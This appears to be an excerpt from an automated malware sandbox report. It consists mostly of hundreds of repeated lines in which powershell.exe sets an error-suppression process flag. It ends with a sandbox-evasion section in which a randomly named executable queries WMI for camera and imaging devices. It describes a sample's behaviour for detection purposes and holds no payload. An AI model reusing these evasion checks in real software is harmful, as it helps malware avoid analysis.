Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
